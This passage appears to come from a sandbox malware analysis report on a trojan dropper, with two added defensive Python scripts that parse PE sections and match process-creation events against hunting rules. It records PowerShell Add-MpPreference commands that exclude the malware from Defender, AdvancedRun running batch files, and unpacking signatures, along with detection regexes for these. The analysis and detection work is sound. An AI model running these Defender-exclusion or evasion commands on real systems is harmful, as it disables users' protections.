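    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (num_sections,) = struct.unpack_from("<H", image, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", image, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size  # 4-byte signature + 20-byte COFF header
    sections = []
    for i in range(num_sections):
        name, vsize, va, raw_size, _, _, _, _, _, chars = struct.unpack_from(
            SECTION_HEADER, image, table + 40 * i)
        sections.append(Section(name.rstrip(b"\0").decode("latin-1"),
                                va, vsize, raw_size, chars))
    return sections


def section_warnings(sections: List[Section]) -> List[str]:
    """Static hints of in-place unpacking: W+X sections, and executable
    sections with no bytes on disk (their code is written at run time)."""
    warnings = []
    for s in sections:
        c = s.characteristics
        if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
            warnings.append(f"{s.name}: writable and executable")
        if c & IMAGE_SCN_MEM_EXECUTE and s.raw_size == 0 and s.virtual_size:
            warnings.append(f"{s.name}: executable but empty on disk")
    return warnings


def build_sample_pe(sections) -> bytes:
    """Constructed minimal PE32 (headers only, no code) so the parser runs
    offline; sections is a list of (name, characteristics, raw_size)."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt_size = 0xE0  # size of a PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B).ljust(opt_size, b"\0")  # Magic = PE32
    table = b"".join(
        struct.pack(SECTION_HEADER, name.ljust(8, b"\0"), 0x1000, 0x1000 * (i + 1),
                    raw_size, 0x400 if raw_size else 0, 0, 0, 0, 0, chars)
        for i, (name, chars, raw_size) in enumerate(sections))
    return dos + b"PE\0\0" + coff + opt + table


# Constructed section mix: a conventional .text/.rdata/.data layout plus a
# UPX-style uninitialized RWX section typical of a self-unpacking stub.
SAMPLE_PE = build_sample_pe([
    (b".text", 0x60000020, 0x200),
    (b".rdata", 0x40000040, 0x200),
    (b".data", 0xC0000040, 0x200),
    (b"UPX0", 0xE0000080, 0),
])

if __name__ == "__main__":
    parsed = parse_sections(SAMPLE_PE)
    for s in parsed:
        print(f"Section: {s.name} {', '.join(flag_names(s.characteristics))}")
    print(section_warnings(parsed))
```

Pointing `parse_sections` at `open(path, "rb").read()` of a real dropped file gives the same per-section decode; a packed sample usually shows the warnings on the section that the report later reports as having had its rights changed or its PE header overwritten.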
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\esdfufc
Source: 1105.tmp.22.dr Binary string: \Device\IPT
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@43/42@60/11
Source: C:\Users\user\AppData\Local\Temp\37D8.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 25_2_00401306
Source: y8WngeDn4q.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 25_2_0040A33B
Source: y8WngeDn4q.exe Virustotal: Detection: 36%
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\y8WngeDn4q.exe 'C:\Users\user\Desktop\y8WngeDn4q.exe'
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Process created: C:\Users\user\Desktop\y8WngeDn4q.exe 'C:\Users\user\Desktop\y8WngeDn4q.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\esdfufc C:\Users\user\AppData\Roaming\esdfufc
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8908.exe C:\Users\user\AppData\Local\Temp\8908.exe
Source: C:\Users\user\AppData\Roaming\esdfufc Process created: C:\Users\user\AppData\Roaming\esdfufc C:\Users\user\AppData\Roaming\esdfufc
Source: C:\Users\user\AppData\Local\Temp\8908.exe Process created: C:\Users\user\AppData\Local\Temp\8908.exe C:\Users\user\AppData\Local\Temp\8908.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\37D8.exe C:\Users\user\AppData\Local\Temp\37D8.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3FD8.exe C:\Users\user\AppData\Local\Temp\3FD8.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4EDC.exe C:\Users\user\AppData\Local\Temp\4EDC.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\60DF.exe C:\Users\user\AppData\Local\Temp\60DF.exe
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6E1E.exe C:\Users\user\AppData\Local\Temp\6E1E.exe
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /SpecialRun 4101d8 5988
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E4D7.exe C:\Users\user\AppData\Local\Temp\E4D7.exe
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\37D8.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /SpecialRun 4101d8 780
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\60DF.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\csdfufc C:\Users\user\AppData\Roaming\csdfufc
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B74C.exe C:\Users\user\AppData\Local\Temp\B74C.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C651.exe C:\Users\user\AppData\Local\Temp\C651.exe
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\D083.exe C:\Users\user\AppData\Local\Temp\D083.exe
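The process creations listed above are where the report's behavioural signatures come from: explorer.exe launching payloads out of %TEMP%, 37D8.exe and 60DF.exe excluding themselves from Defender with Add-MpPreference -ExclusionPath, NirSoft AdvancedRun being handed a test.bat, and 37D8.exe starting the .NET framework utilities DataSvcUtil.exe and SMSvcHost.exe with no arguments, a pattern consistent with the hollowing signature in the overview. The script below is an added example, not part of the Joe Sandbox report: it parses a constructed sample of these "Process created:" lines (copied from the report, with the "Jump to behavior" link residue stripped by the parser and the conhost.exe launch kept as a benign control) and applies four hunting rules over them. The rule names are the editor's; treating a Temp-resident parent that launches a framework binary with no arguments as a hollowing candidate is an analyst heuristic, not a claim the report makes.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: "Process created:" events copied from the report lines
# above, plus the conhost.exe launch as a benign control case.
SAMPLE_EVENTS = [
    r"Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8908.exe C:\Users\user\AppData\Local\Temp\8908.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run",
    r"Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\37D8.exe' -Force",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r"Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\60DF.exe' -Force",
    r"Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /SpecialRun 4101d8 5988",
]

# Report line shape: "Source: <parent> Process created: <image> <command line>",
# optionally followed by the "Jump to behavior" link text from the web page.
EVENT = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<rest>.+?)(?: Jump to behavior)?$")
USER_WRITABLE = re.compile(r"\\appdata\\(?:local\\temp|roaming)\\", re.I)
DOTNET_FRAMEWORK = re.compile(r"^c:\\windows\\microsoft\.net\\framework(?:64)?\\", re.I)
DEFENDER_EXCLUSION = re.compile(r"\badd-mppreference\b.*-exclusion(?:path|process|extension)\b", re.I)
ADVANCEDRUN_BATCH = re.compile(r"/exefilename\s+'[^']*\.bat'", re.I)


def parse_event(line: str) -> Optional[Dict[str, str]]:
    """Split one report line into parent, image path and command line.
    The image paths in these lines contain no spaces, so the first token
    after 'Process created:' is the image and the remainder the command line."""
    m = EVENT.match(line.strip())
    if not m:
        return None
    image, _, cmdline = m.group("rest").partition(" ")
    return {"parent": m.group("parent"), "image": image, "cmdline": cmdline or image}


def classify(ev: Dict[str, str]) -> List[str]:
    """Hunting rules (names chosen here) matched against a parsed event."""
    parent, image, cmd = ev["parent"], ev["image"], ev["cmdline"]
    hits = []
    # 1. Defender exclusion added from the command line (defence evasion)
    if DEFENDER_EXCLUSION.search(cmd):
        hits.append("defender_exclusion_added")
    # 2. explorer.exe starting an executable from a user-writable directory
    if parent.lower().endswith("\\explorer.exe") and USER_WRITABLE.search(image):
        hits.append("explorer_spawns_from_user_writable_dir")
    # 3. Temp-resident parent starts a .NET framework utility with no arguments
    #    (heuristic: a common hollowing target, not asserted by the report)
    if (USER_WRITABLE.search(parent) and DOTNET_FRAMEWORK.match(image)
            and cmd.strip("'\" ").lower() == image.lower()):
        hits.append("dotnet_utility_launched_without_args")
    # 4. NirSoft AdvancedRun used to execute a batch file
    if image.lower().endswith("\\advancedrun.exe") and ADVANCEDRUN_BATCH.search(cmd):
        hits.append("advancedrun_executes_batch")
    return hits


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (rule, parent, image) for every rule hit across the lines."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for rule in classify(ev):
            findings.append((rule, ev["parent"], ev["image"]))
    return findings


if __name__ == "__main__":
    for rule, parent, image in scan(SAMPLE_EVENTS):
        print(f"{rule:40} {parent} -> {image}")
```

The same rules map directly onto Sysmon Event ID 1 or Windows Security 4688 fields (ParentImage, Image, CommandLine); rule 1 on its own is the high-confidence one, since legitimate software rarely adds exclusions for a path under %TEMP% with -Force.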
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 25_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 28_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 28_2_00408FC9
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8908.tmp
Source: 60DF.exe, 00000018.00000000.509231538.0000000000442000.00000002.00020000.sdmp, 60DF.exe.6.dr Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: sqlite3.dll.29.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.29.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 60DF.exe, 00000018.00000000.509231538.0000000000442000.00000002.00020000.sdmp, 60DF.exe.6.dr Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
Source: sqlite3.dll.29.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.29.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3.dll.29.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sqlite3.dll.29.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3.dll.29.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 25_2_004095FD
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Command line argument: \H 27_2_0043C2B0
Source: C:\Users\user\AppData\Local\Temp\37D8.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\60DF.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\37D8.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: y8WngeDn4q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\vojos\fuw.pdb source: 4EDC.exe, 00000016.00000002.528243755.0000000000417000.00000002.00020000.sdmp, csdfufc.6.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: DAA6.exe.6.dr
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000002.527231593.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001C.00000002.528560998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000021.00000002.570535756.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000024.00000000.565833998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.19.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: DAA6.exe.6.dr
Source: Binary string: C:\ciwomo siju28 nijohon\93-loze\2.pdb source: 6E1E.exe, gbdfufc.6.dr
Source: Binary string: +C:\tuy.pdb` source: y8WngeDn4q.exe
Source: Binary string: C:\lewusukoviv.pdb source: FBAD.exe.6.dr
Source: Binary string: C:\tuy.pdb source: y8WngeDn4q.exe
Source: Binary string: wntdll.pdbUGP source: 4EDC.exe, 00000016.00000002.530995436.000000006BFE1000.00000020.00020000.sdmp, 1105.tmp.22.dr
Source: Binary string: wntdll.pdb source: 4EDC.exe, 1105.tmp.22.dr
Source: Binary string: `C:\ciwomo siju28 nijohon\93-loze\2.pdb` source: 6E1E.exe, 0000001B.00000000.521192744.0000000000401000.00000020.00020000.sdmp, gbdfufc.6.dr
Source: Binary string: bC:\ciyomolibit\vowudavumaz68\fubevu\vatatageh\yayawav\duji.pdb` source: E4D7.exe.6.dr
Source: Binary string: :C:\venu4-divilavujar1.pdb` source: B74C.exe.6.dr
Source: Binary string: C:\lewusukoviv.pdb` source: FBAD.exe.6.dr
Source: Binary string: C:\tosofom\yopuk.pdb source: C651.exe.6.dr
Source: Binary string: C:\venu4-divilavujar1.pdb source: B74C.exe.6.dr
Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: E11F.exe.6.dr
Source: Binary string: C:\ciyomolibit\vowudavumaz68\fubevu\vatatageh\yayawav\duji.pdb source: E4D7.exe.6.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe Unpacked PE file: 29.2.E4D7.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\C651.exe Unpacked PE file: 41.2.C651.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Unpacked PE file: 22.2.4EDC.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Unpacked PE file: 27.2.6E1E.exe.400000.0.unpack .text:ER;.data:W;.daya:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe Unpacked PE file: 29.2.E4D7.exe.400000.0.unpack .text:ER;.data:W;.vif:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\C651.exe Unpacked PE file: 41.2.C651.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xoj:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
.NET source code contains potential unpacker
Source: 3AE.exe.6.dr, SimplePaint/FrmMain.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E54 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E63 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402665 push cs; ret 22_2_0040266B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_0040290C push eax; iretd 22_2_0040290D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E16 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402DC0 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402DD8 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402DE8 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402DF1 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E82 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E85 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402D92 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E95 push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00401D9A pushad ; ret 22_2_00401DA3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402E9C push eax; ret 22_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C05D0D1 push ecx; ret 22_2_6C05D0E4
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_0040B50D push ecx; ret 25_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401A61 push ds; retf 27_2_00401A69
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401569 push edx; iretd 27_2_004015D2
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401569 push edx; iretd 27_2_004015EB
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402874 push esp; iretd 27_2_00402875
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401575 push edx; iretd 27_2_004015D2
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402F19 push eax; ret 27_2_00402FEA
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_004015D3 push edx; iretd 27_2_004015EB
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_004026D8 push ds; retf 27_2_004026DC
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401580 push edx; iretd 27_2_004015D2
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401981 push ebx; retf 27_2_00401982
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401591 push edx; iretd 27_2_004015D2
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401595 push edx; iretd 27_2_004015D2
Contains functionality to dynamically determine API calls
